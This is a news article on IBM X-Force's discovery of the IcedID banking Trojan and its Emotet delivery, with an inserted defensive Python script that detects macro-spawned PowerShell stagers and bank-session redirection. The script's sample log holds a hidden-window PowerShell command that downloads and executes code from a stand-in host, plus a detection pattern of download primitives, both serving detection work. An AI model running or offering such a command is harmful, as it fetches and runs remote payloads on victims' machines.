IcedID Banking Trojan Redirects Users to Fake Sites, IBM Reports

IBM researchers discover a new banking Trojan that is built with custom code, though it uses similar tactics to existing malware attacks.


The IBM X-Force research team has discovered a new banking Trojan, dubbed "IcedID," that is taking aim at global financial institutions.

The IcedID Trojan relies on the Emotet malware dropper to exploit a victim's system. IcedID then provides the Trojan payload, redirecting victims to an attacker site that is a replica of a real banking website. The IcedID Trojan attack has targeted banks, payment card providers and e-commerce sites in the United States, Canada and the UK.

"IBM X-Force monitors close to 300 million protected endpoints across the globe, detecting and mapping threat evolution close to real time," Limor Kessem, executive security adviser at IBM Security, told eWEEK. "X-Force research detected and analyzed IcedID as soon as it was identified in attempts to infect end users."

It's not clear how many victims IcedID has claimed or how widespread the distribution of the Trojan is. Kessem said X-Force detected IcedID very early after its launch, and so far the campaigns are still small, with the number of infections being limited. 

By using the Emotet dropper as a distribution mechanism, IcedID's authors have attempted to keep the malware under the radar, Kessem noted, adding that Emotet itself is usually delivered via malware spam (malspam), often concealed in productivity file attachments.

"After the user is first infected with Emotet, the latter is used as a covert tunnel through which other malware is delivered and executed on the endpoint," she said. "Aside from newly dropping IcedID, Emotet is known for its connection with a variety of malicious codes, most recently the QakBot banking Trojan that targets business banking in North America."

Among IcedID's core capabilities is redirecting victims to an attacker-controlled site. Instead of using web injections on a bank's site, IcedID takes a victim to a page it serves from its own server and can communicate with the victim there, away from the bank's control. Kessem said the redirection pages are often difficult for regular users to identify.

"Redirection attacks are malware-facilitated operations in which the bank’s genuine site is an unwilling participant," she said. "The malware keeps a live connection to the genuine site and manipulates the fake session in a way that has it present the bank's true URL in the address bar."

IcedID does not directly exploit user systems; it is delivered into an already compromised endpoint that was first exploited by the Emotet dropper.

"To gain the initial foothold, Emotet uses malicious JavaScript in file macros in order to invoke a PowerShell script to fetch the payload from a remote server," Kessem said. "This process is initiated by unwitting users who are tricked into opening email attachments that carry concealed malcode."
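Two of the behaviours described above, the Emotet foothold (an Office macro invoking PowerShell to fetch a payload) and the IcedID redirection (a session that displays the bank's real hostname while being served from an attacker-controlled address), can be turned into simple detection heuristics. The following is an added example written for this page, not code from IBM X-Force or from the article; the log field layout, the hostname `online.examplebank.test`, and all IP ranges are constructed assumptions for illustration.

```python
"""Defender-side heuristics for the two behaviours the article describes:
(1) an Office application spawning a script host whose command line fetches
    something from a remote server (the Emotet macro -> PowerShell stager);
(2) a session whose hostname is the bank's but whose destination address is
    not one the bank is expected to serve from (the IcedID redirection).

All log lines, hostnames and IP ranges here are constructed for illustration.
"""
import ipaddress
import re
from dataclasses import dataclass

# --- (1) Office parent -> script host -> remote fetch ----------------------

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Download primitives commonly seen in stager command lines, plus a bare URL.
FETCH_PATTERN = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|"
    r"start-bitstransfer|\bhttps?://)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    parent: str   # parent image basename, lower-cased
    image: str    # child image basename, lower-cased
    cmdline: str  # full child command line


def parse_proc_event(line: str) -> ProcEvent:
    """Parse a constructed key="value" process-creation record (Sysmon-style fields)."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcEvent(
        parent=fields["ParentImage"].rsplit("\\", 1)[-1].lower(),
        image=fields["Image"].rsplit("\\", 1)[-1].lower(),
        cmdline=fields["CommandLine"],
    )


def is_macro_stager(ev: ProcEvent) -> bool:
    """True when an Office app spawns a script host that reaches out to fetch a payload."""
    return (ev.parent in OFFICE_PARENTS
            and ev.image in SCRIPT_HOSTS
            and FETCH_PATTERN.search(ev.cmdline) is not None)


def find_macro_stagers(lines):
    return [ev for ev in map(parse_proc_event, lines) if is_macro_stager(ev)]


# --- (2) bank hostname served from an unexpected address -------------------

# Constructed allow-list: address ranges the bank's hostname is expected to
# resolve to. In practice this comes from the bank's published DNS/CDN ranges.
EXPECTED_RANGES = {
    "online.examplebank.test": [ipaddress.ip_network("203.0.113.0/24")],
}


def parse_conn(line: str):
    """Parse a constructed proxy/TLS log line of the form 'host=<sni> dst=<ip>'."""
    m = re.match(r"host=(\S+)\s+dst=(\S+)", line)
    return m.group(1).lower(), ipaddress.ip_address(m.group(2))


def is_offsite_session(host, dst) -> bool:
    ranges = EXPECTED_RANGES.get(host)
    if ranges is None:
        return False  # hostname is not one we monitor
    return not any(dst in net for net in ranges)


def find_offsite_sessions(lines):
    return [(h, str(d)) for h, d in map(parse_conn, lines) if is_offsite_session(h, d)]


# Constructed sample input (not real telemetry).
PROC_LOG = [
    'ParentImage="C:\\Program Files\\Microsoft Office\\WINWORD.EXE" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/x\')"',
    'ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell Get-Process"',
    'ParentImage="C:\\Program Files\\Microsoft Office\\EXCEL.EXE" '
    'Image="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd /c echo hi"',
]
CONN_LOG = [
    "host=online.examplebank.test dst=203.0.113.45",
    "host=online.examplebank.test dst=198.51.100.9",
    "host=www.example.test dst=192.0.2.1",
]

if __name__ == "__main__":
    for ev in find_macro_stagers(PROC_LOG):
        print("macro stager:", ev.parent, "->", ev.image, "|", ev.cmdline[:60])
    for host, dst in find_offsite_sessions(CONN_LOG):
        print("bank hostname served from unexpected address:", host, dst)
```

Run against the constructed logs, the first heuristic flags only the WINWORD.EXE -> powershell.exe event (explorer.exe launching PowerShell and Excel launching cmd.exe are left alone), and the second flags the bank hostname session whose destination lies outside the expected range. Both heuristics are deliberately narrow: the process check needs all three conditions (Office parent, script host, fetch primitive) and the session check only speaks about hostnames it has an allow-list for.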

Although IcedID uses tactics seen in other banking Trojans, IBM X-Force's analysis found it to be custom code. It's not clear where IcedID came from or who wrote it. Kessem warned that when it comes to cyber-crime activity, attribution is often tricky, as malware can be operated by different groups or subgroups, or be sold and shared. That said, IBM X-Force researchers do have some suspicions.

"According to an analysis of IcedID's infrastructure, the malware's main servers are hosted in Russia," Kessem said. "Judging by the company it keeps, IcedID is delivered by the same group that delivers QakBot and Dridex, both of which are also known to come from Russian-speaking regions."

Sean Michael Kerner is a senior editor at eWEEK. Follow him on Twitter @TechJournalist.

Sean Michael Kerner is an Internet consultant, strategist, and contributor to several leading IT business web sites.